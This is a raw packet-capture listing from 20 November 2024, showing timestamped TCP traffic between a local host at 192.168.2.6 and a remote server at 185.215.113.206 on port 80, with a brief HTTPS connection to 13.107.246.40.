                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111738920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111752033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111778021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111778021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111778021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111778021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111810923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111820936 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111831903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111861944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111861944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111861944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111901999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111958027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111968994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111980915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111990929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112010002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112059116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112059116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112059116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112068892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112085104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112098932 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112133980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112145901 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112158060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112169981 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112190008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112200975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112210989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112221956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112245083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112246990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112246990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112246990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112257004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112267971 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112268925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112282991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112374067 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112374067 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112539053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112634897 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112646103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112656116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112667084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112679958 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112741947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112741947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112870932 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112881899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112893105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112905979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112917900 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112921000 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112929106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112941027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112988949 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112988949 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.112988949 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113035917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113046885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113056898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113069057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113080025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113091946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113148928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113148928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113148928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113162041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113174915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113185883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113197088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113209009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113296032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113306999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113317966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113328934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113339901 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113339901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113339901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113339901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113352060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113363028 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113373041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113384962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113395929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113423109 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113423109 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113423109 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113436937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113447905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113459110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113461971 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113470078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113483906 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113495111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113506079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113537073 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113537073 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113537073 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113537073 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113575935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113586903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113591909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113604069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113606930 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113616943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113630056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113641977 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113656044 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113667011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113691092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113691092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113691092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.113759041 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.146811008 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.146850109 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.197942019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.197962046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.197973967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.197985888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.197999001 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198010921 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198021889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198034048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198045969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198056936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198060989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198075056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198086023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198091030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198098898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198111057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198112011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198126078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198137045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198159933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198173046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198184967 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198184967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198184967 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198184967 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198199987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198205948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198213100 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198225975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198237896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198251009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198261023 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198261023 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198319912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198334932 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198340893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198340893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198347092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198360920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198374033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198385954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198399067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198404074 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198404074 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198411942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198425055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198515892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198528051 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198539019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198549986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198559999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198559999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198559999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198559999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198585033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198596954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198607922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198618889 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198633909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198633909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198633909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198633909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198654890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198674917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198688030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198697090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198708057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198719978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198721886 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198721886 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198721886 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198731899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198745966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198757887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198767900 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198776007 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198781013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198796034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198810101 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198816061 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198827982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198831081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198843956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198856115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198864937 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198868036 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198904991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198913097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198924065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198935032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198945045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198947906 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198960066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198964119 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198971987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.198986053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199001074 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199003935 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199019909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199043989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199050903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199064970 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199074984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199090958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199100018 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199110985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199115038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199122906 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199129105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199142933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199156046 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199157000 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199174881 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199261904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199652910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199763060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199774027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199784994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199796915 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199815035 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199826002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199836016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199847937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199851990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199858904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199872971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199887991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199906111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199917078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199922085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199932098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199944019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199955940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199966908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199979067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.199994087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200038910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200051069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200053930 CET4991080192.168.2.6185.215.113.206
